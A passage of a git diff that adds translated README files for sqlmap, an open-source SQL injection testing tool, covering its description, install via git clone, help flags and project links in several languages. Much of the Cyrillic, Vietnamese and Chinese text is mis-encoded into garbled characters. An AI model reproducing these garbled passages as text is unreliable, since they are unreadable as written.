[tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po klikniÄ™ciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Można również pobrać sqlmap klonujÄ…c rezozytorium [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +do użycia sqlmap potrzebny jest [Python](https://www.python.org/download/) w wersji **2.7** lub **3.x** na dowolnej platformie systemowej. + +Sposób użycia +---- + +Aby uzyskać listÄ™ podstawowych funkcji i parametrów użyj polecenia: + + python sqlmap.py -h + +Aby uzyskać listÄ™ wszystkich funkcji i parametrów użyj polecenia: + + python sqlmap.py -hh + +PrzykÅ‚adowy wynik dziaÅ‚ania można znaleźć [tutaj](https://asciinema.org/a/46601). +Aby uzyskać listÄ™ wszystkich dostÄ™pnych funkcji, parametrów oraz opisów ich dziaÅ‚ania wraz z przykÅ‚adami użycia sqlmap zalecamy odwiedzić [instrukcjÄ™ użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +OdnoÅ›niki +---- + +* Strona projektu: https://sqlmap.org +* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) lub [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* ZgÅ‚aszanie błędów: https://github.com/sqlmapproject/sqlmap/issues +* Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki +* CzÄ™sto zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Dema: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Zrzuty ekranu: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-pt-BR.md b/doc/translations/README-pt-BR.md new file mode 100644 index 00000000000..9f5ebfd9938 --- /dev/null +++ b/doc/translations/README-pt-BR.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap é uma ferramenta de teste de intrusão, de código aberto, que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de intrusão por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional. + +Imagens +---- + +![Imagem](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Você pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demonstra alguns dos recursos apresentados na wiki. + +Instalação +---- + +Você pode baixar o arquivo tar mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master). + +De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funciona em [Python](https://www.python.org/download/) nas versões **2.7** e **3.x** em todas as plataformas. + +Como usar +---- + +Para obter uma lista das opções básicas faça: + + python sqlmap.py -h + +Para obter a lista completa de opções faça: + + python sqlmap.py -hh + +Você pode encontrar alguns exemplos [aqui](https://asciinema.org/a/46601). +Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki). + +Links +---- + +* Homepage: https://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki +* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demonstrações: [#1](https://www.youtube.com/user/inquisb/videos) e [#2](https://www.youtube.com/user/stamparm/videos) +* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-rs-RS.md b/doc/translations/README-rs-RS.md new file mode 100644 index 00000000000..e130727feaa --- /dev/null +++ b/doc/translations/README-rs-RS.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap je alat otvorenog koda namenjen za penetraciono testiranje koji automatizuje proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije i preuzimanje baza podataka. Dolazi s moćnim mehanizmom za detekciju, mnoÅ¡tvom korisnih opcija za napredno penetracijsko testiranje te Å¡iroki spektar opcija od onih za prepoznavanja baze podataka, preko uzimanja podataka iz baze, do pristupa zahvaćenom fajl sistemu i izvrÅ¡avanja komandi na operativnom sistemu koriÅ¡tenjem tzv. "out-of-band" veza. + +Slike +---- + +![Slika](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Možete posetiti [kolekciju slika](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gde su demonstrirane neke od e se demonstriraju neke od funkcija na wiki stranicama. + +Instalacija +---- + +Možete preuzeti najnoviji tarball klikom [ovde](https://github.com/sqlmapproject/sqlmap/tarball/master) ili najnoviji zipball klikom [ovde](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Opciono, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap radi bez posebnih zahteva koriÅ¡tenjem [Python](https://www.python.org/download/) verzije **2.7** i/ili **3.x** na bilo kojoj platformi. + +Korišćenje +---- + +Kako biste dobili listu osnovnih opcija i prekidaÄa koristite: + + python sqlmap.py -h + +Kako biste dobili listu svih opcija i prekidaÄa koristite: + + python sqlmap.py -hh + +Možete pronaći primer izvrÅ¡avanja [ovde](https://asciinema.org/a/46601). +Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih funkcija, te opis svih opcija i prekidaÄa, zajedno s primerima, preporuÄen je uvid u [korisniÄki priruÄnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Linkovi +---- + +* PoÄetna stranica: https://sqlmap.org +* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed promena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues +* KorisniÄki priruÄnik: https://github.com/sqlmapproject/sqlmap/wiki +* NajÄešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Slike: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ru-RU.md b/doc/translations/README-ru-RU.md new file mode 100644 index 00000000000..38147222530 --- /dev/null +++ b/doc/translations/README-ru-RU.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap - Ñто инÑтрумент Ð´Ð»Ñ Ñ‚ÐµÑÑ‚Ð¸Ñ€Ð¾Ð²Ð°Ð½Ð¸Ñ ÑƒÑзвимоÑтей Ñ Ð¾Ñ‚ÐºÑ€Ñ‹Ñ‚Ñ‹Ð¼ иÑходным кодом, который автоматизирует процеÑÑ Ð¾Ð±Ð½Ð°Ñ€ÑƒÐ¶ÐµÐ½Ð¸Ñ Ð¸ иÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð¾ÑˆÐ¸Ð±Ð¾Ðº SQL-инъекций и захвата Ñерверов баз данных. Он оÑнащен мощным механизмом обнаружениÑ, множеÑтвом приÑтных функций Ð´Ð»Ñ Ð¿Ñ€Ð¾Ñ„ÐµÑÑионального теÑтера уÑзвимоÑтей и широким Ñпектром Ñкриптов, которые упрощают работу Ñ Ð±Ð°Ð·Ð°Ð¼Ð¸ данных, от Ñбора данных из базы данных, до доÑтупа к базовой файловой ÑиÑтеме и Ð²Ñ‹Ð¿Ð¾Ð»Ð½ÐµÐ½Ð¸Ñ ÐºÐ¾Ð¼Ð°Ð½Ð´ в операционной ÑиÑтеме через out-of-band Ñоединение. + +Скриншоты +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Ð’Ñ‹ можете поÑетить [набор Ñкриншотов](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) демонÑтрируемые некоторые функции в wiki. + +УÑтановка +---- + +Ð’Ñ‹ можете Ñкачать поÑледнюю верÑию tarball, нажав [Ñюда](https://github.com/sqlmapproject/sqlmap/tarball/master) или поÑледний zipball, нажав [Ñюда](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Предпочтительно вы можете загрузить sqlmap, ÐºÐ»Ð¾Ð½Ð¸Ñ€ÑƒÑ [Git](https://github.com/sqlmapproject/sqlmap) репозиторий: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap работает из коробки Ñ [Python](https://www.python.org/download/) верÑии **2.7** и **3.x** на любой платформе. + +ИÑпользование +---- + +Чтобы получить ÑпиÑок оÑновных опций и вариантов выбора, иÑпользуйте: + + python sqlmap.py -h + +Чтобы получить ÑпиÑок вÑех опций и вариантов выбора, иÑпользуйте: + + python sqlmap.py -hh + +Ð’Ñ‹ можете найти пробный запуÑк [тут](https://asciinema.org/a/46601). +Чтобы получить обзор возможноÑтей sqlmap, ÑпиÑок поддерживаемых функций и опиÑание вÑех параметров и переключателей, а также примеры, вам рекомендуетÑÑ Ð¾Ð·Ð½Ð°ÐºÐ¾Ð¼Ð¸Ñ‚ÑÑ Ñ [пользовательÑким мануалом](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +СÑылки +---- + +* ОÑновной Ñайт: https://sqlmap.org +* Скачивание: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) или [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Канал новоÑтей RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* ОтÑлеживание проблем: https://github.com/sqlmapproject/sqlmap/issues +* ПользовательÑкий мануал: https://github.com/sqlmapproject/sqlmap/wiki +* ЧаÑто задаваемые вопроÑÑ‹ (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Демки: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-sk-SK.md b/doc/translations/README-sk-SK.md new file mode 100644 index 00000000000..d673b3e3aa8 --- /dev/null +++ b/doc/translations/README-sk-SK.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap je open source nástroj na penetraÄné testovanie, ktorý automatizuje proces detekovania a využívania chýb SQL injekcie a preberania databázových serverov. Je vybavený výkonným detekÄným mechanizmom, mnohými výklenkovými funkciami pre dokonalého penetraÄného testera a Å¡irokou Å¡kálou prepínaÄov vrátane odtlaÄkov databázy, cez naÄítanie údajov z databázy, prístup k základnému súborovému systému a vykonávanie príkazov v operaÄnom systéme prostredníctvom mimopásmových pripojení. + +Snímky obrazovky +---- + +![snímka obrazovky](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Môžete navÅ¡tíviÅ¥ [zbierku snímok obrazovky](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), ktorá demonÅ¡truuje niektoré funkcie na wiki. + +InÅ¡talácia +---- + +Najnovší tarball si môžete stiahnuÅ¥ kliknutím [sem](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo najnovší zipball kliknutím [sem](https://github.com/sqlmapproject/sqlmap/zipball/master). + +NajlepÅ¡ie je stiahnuÅ¥ sqlmap naklonovaním [Git](https://github.com/sqlmapproject/sqlmap) repozitára: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funguje bez problémov s programovacím jazykom [Python](https://www.python.org/download/) vo verziách **2.7** a **3.x** na akejkoľvek platforme. + +Využitie +---- + +Na získanie zoznamu základných možností a prepínaÄov, použite: + + python sqlmap.py -h + +Na získanie zoznamu vÅ¡etkých možností a prepínaÄov, použite: + + python sqlmap.py -hh + +Vzorku behu nájdete [tu](https://asciinema.org/a/46601). +Ak chcete získaÅ¥ prehľad o možnostiach sqlmap, zoznam podporovaných funkcií a opis vÅ¡etkých možností a prepínaÄov spolu s príkladmi, odporúÄame vám nahliadnuÅ¥ do [Používateľskej príruÄky](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Linky +---- + +* Domovská stránka: https://sqlmap.org +* Stiahnutia: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Zdroje RSS Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* SledovaÄ problémov: https://github.com/sqlmapproject/sqlmap/issues +* Používateľská príruÄka: https://github.com/sqlmapproject/sqlmap/wiki +* ÄŒasto kladené otázky (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demá: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Snímky obrazovky: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots \ No newline at end of file diff --git a/doc/translations/README-tr-TR.md b/doc/translations/README-tr-TR.md new file mode 100644 index 00000000000..46e5267e9e0 --- /dev/null +++ b/doc/translations/README-tr-TR.md @@ -0,0 +1,53 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap geliÅŸmiÅŸ tespit özelliÄŸinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek birçok aracı, uzak veritabanından, veri indirmek, dosya sistemine eriÅŸmek, dosya çalıştırmak gibi iÅŸlevleri de barındırmaktadır. + + +Ekran görüntüleri +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + + +İsterseniz özelliklerin tanıtımının yapıldığı [ekran görüntüleri](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz. + + +Kurulum +---- + +[Buraya](https://github.com/sqlmapproject/sqlmap/tarball/master) tıklayarak en son sürüm tarball'ı veya [buraya](https://github.com/sqlmapproject/sqlmap/zipball/master) tıklayarak zipball'ı indirebilirsiniz. + +Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayarak indirebilirsiniz + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.7** ve **3.x** versiyonları ile bütün platformlarda çalışabilmektedir. + +Kullanım +---- + + +Bütün basit seçeneklerin listesini gösterir + + python sqlmap.py -h + +Bütün seçenekleri gösterir + + python sqlmap.py -hh + +Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası için sqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduÄŸu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki/Usage) bakmanızı tavsiye ediyoruz + +BaÄŸlantılar +---- + +* Anasayfa: https://sqlmap.org +* İndirme baÄŸlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) veya [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues +* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki +* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demolar: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-uk-UA.md b/doc/translations/README-uk-UA.md new file mode 100644 index 00000000000..ab7814676b1 --- /dev/null +++ b/doc/translations/README-uk-UA.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap - це інÑтрумент Ð´Ð»Ñ Ñ‚ÐµÑÑ‚ÑƒÐ²Ð°Ð½Ð½Ñ Ð²Ñ€Ð°Ð·Ð»Ð¸Ð²Ð¾Ñтей з відкритим Ñирцевим кодом, Ñкий автоматизує Ð¿Ñ€Ð¾Ñ†ÐµÑ Ð²Ð¸ÑÐ²Ð»ÐµÐ½Ð½Ñ Ñ– викориÑÑ‚Ð°Ð½Ð½Ñ Ð´ÐµÑ„ÐµÐºÑ‚Ñ–Ð² SQL-ін'єкцій, а також Ð·Ð°Ñ…Ð¾Ð¿Ð»ÐµÐ½Ð½Ñ Ñерверів баз даних. Він оÑнащений потужним механізмом виÑвленнÑ, безліччю приємних функцій Ð´Ð»Ñ Ð¿Ñ€Ð¾Ñ„ÐµÑійного теÑтувальника вразливоÑтей Ñ– широким Ñпектром Ñкриптів, Ñкі Ñпрощують роботу з базами даних - від відбитка бази даних до доÑтупу до базової файлової ÑиÑтеми та Ð²Ð¸ÐºÐ¾Ð½Ð°Ð½Ð½Ñ ÐºÐ¾Ð¼Ð°Ð½Ð´ в операційній ÑиÑтемі через out-of-band з'єднаннÑ. + +Скриншоти +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Ви можете ознайомитиÑÑ Ð· [колекцією Ñкриншотів](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), Ñкі демонÑтрують деÑкі функції в wiki. + +Ð’ÑÑ‚Ð°Ð½Ð¾Ð²Ð»ÐµÐ½Ð½Ñ +---- + +Ви можете завантажити оÑтанню верÑÑ–ÑŽ tarball натиÑнувши [Ñюди](https://github.com/sqlmapproject/sqlmap/tarball/master) або оÑтанню верÑÑ–ÑŽ zipball натиÑнувши [Ñюди](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Ðайкраще завантажити sqlmap шлÑхом ÐºÐ»Ð¾Ð½ÑƒÐ²Ð°Ð½Ð½Ñ [Git](https://github.com/sqlmapproject/sqlmap) репозиторію: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap «працює з коробки» з [Python](https://www.python.org/download/) верÑÑ–Ñ— **2.7** та **3.x** на будь-Ñкій платформі. + +ВикориÑÑ‚Ð°Ð½Ð½Ñ +---- + +Щоб отримати ÑпиÑок оÑновних опцій Ñ– перемикачів, викориÑтовуйте: + + python sqlmap.py -h + +Щоб отримати ÑпиÑок вÑÑ–Ñ… опцій Ñ– перемикачів, викориÑтовуйте: + + python sqlmap.py -hh + +Ви можете знайти приклад Ð²Ð¸ÐºÐ¾Ð½Ð°Ð½Ð½Ñ [тут](https://asciinema.org/a/46601). +Ð”Ð»Ñ Ñ‚Ð¾Ð³Ð¾, щоб ознайомитиÑÑ Ð· можливоÑÑ‚Ñми sqlmap, ÑпиÑком підтримуваних функцій та опиÑом вÑÑ–Ñ… параметрів Ñ– перемикачів, а також прикладами, вам рекомендуєтьÑÑ ÑкориÑтатиÑÑ [інÑтрукцією кориÑтувача](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +ПоÑÐ¸Ð»Ð°Ð½Ð½Ñ +---- + +* ОÑновний Ñайт: https://sqlmap.org +* ЗавантаженнÑ: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) або [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Канал новин RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* ВідÑÑ‚ÐµÐ¶ÐµÐ½Ð½Ñ Ð¿Ñ€Ð¾Ð±Ð»ÐµÐ¼: https://github.com/sqlmapproject/sqlmap/issues +* ІнÑÑ‚Ñ€ÑƒÐºÑ†Ñ–Ñ ÐºÐ¾Ñ€Ð¸Ñтувача: https://github.com/sqlmapproject/sqlmap/wiki +* Поширенні Ð¿Ð¸Ñ‚Ð°Ð½Ð½Ñ (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Скриншоти: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-vi-VN.md b/doc/translations/README-vi-VN.md new file mode 100644 index 00000000000..ceb2724552d --- /dev/null +++ b/doc/translations/README-vi-VN.md @@ -0,0 +1,52 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap là má»™t công cụ kiểm tra thâm nhập mã nguồn mở, nhằm tá»± động hóa quá trình phát hiện, khai thác lá»— hổng SQL injection và tiếp quản các máy chá»§ cÆ¡ sở dữ liệu. Công cụ này Ä‘i kèm vá»›i +má»™t hệ thống phát hiện mạnh mẽ, nhiá»u tính năng thích hợp cho ngưá»i kiểm tra thâm nhập (pentester) và má»™t loạt các tùy chá»n bao gồm phát hiện, truy xuất dữ liệu từ cÆ¡ sở dữ liệu, truy cập file hệ thống và thá»±c hiện các lệnh trên hệ Ä‘iá»u hành từ xa. + +Ảnh chụp màn hình +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Bạn có thể truy cập vào [bá»™ sưu tập ảnh chụp màn hình](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) - nÆ¡i trình bày má»™t số tính năng có thể tìm thấy trong wiki. + +Cài đặt +---- + + +Bạn có thể tải xuống tập tin nén tar má»›i nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc tập tin nén zip má»›i nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Tốt hÆ¡n là bạn nên tải xuống sqlmap bằng cách clone vá» repo [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap hoạt động hiệu quả vá»›i [Python](https://www.python.org/download/) phiên bản **2.7** và **3.x** trên bất kì hệ Ä‘iá»u hành nào. + +Sá»­ dụng +---- + +Äể có được danh sách các tùy chá»n cÆ¡ bản và switch, hãy chạy: + + python sqlmap.py -h + +Äể có được danh sách tất cả các tùy chá»n và switch, hãy chạy: + + python sqlmap.py -hh + +Bạn có thể xem video demo [tại đây](https://asciinema.org/a/46601). +Äể có cái nhìn tổng quan vá» sqlmap, danh sách các tính năng được há»— trợ và mô tả vá» tất cả các tùy chá»n, cùng vá»›i các ví dụ, bạn nên tham khảo [hướng dẫn sá»­ dụng](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (Tiếng Anh). + +Liên kết +---- + +* Trang chá»§: https://sqlmap.org +* Tải xuống: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Nguồn cấp dữ liệu RSS vá» commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Theo dõi issue: https://github.com/sqlmapproject/sqlmap/issues +* Hướng dẫn sá»­ dụng: https://github.com/sqlmapproject/sqlmap/wiki +* Các câu há»i thưá»ng gặp (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Ảnh chụp màn hình: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-zh-CN.md b/doc/translations/README-zh-CN.md new file mode 100644 index 00000000000..b065c10a0fa --- /dev/null +++ b/doc/translations/README-zh-CN.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap 是一款开æºçš„æ¸—逿µ‹è¯•工具,å¯ä»¥è‡ªåŠ¨åŒ–è¿›è¡ŒSQL注入的检测ã€åˆ©ç”¨ï¼Œå¹¶èƒ½æŽ¥ç®¡æ•°æ®åº“æœåŠ¡å™¨ã€‚å®ƒå…·æœ‰åŠŸèƒ½å¼ºå¤§çš„æ£€æµ‹å¼•æ“Ž,ä¸ºæ¸—é€æµ‹è¯•人员æä¾›äº†è®¸å¤šä¸“业的功能并且å¯ä»¥è¿›è¡Œç»„åˆï¼Œå…¶ä¸­åŒ…括数æ®åº“æŒ‡çº¹è¯†åˆ«ã€æ•°æ®è¯»å–和访问底层文件系统,甚至å¯ä»¥é€šè¿‡å¸¦å¤–æ•°æ®è¿žæŽ¥çš„æ–¹å¼æ‰§è¡Œç³»ç»Ÿå‘½ä»¤ã€‚ + +演示截图 +---- + +![截图](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +ä½ å¯ä»¥æŸ¥çœ‹ wiki 上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 了解å„ç§ç”¨æ³•的示例 + +安装方法 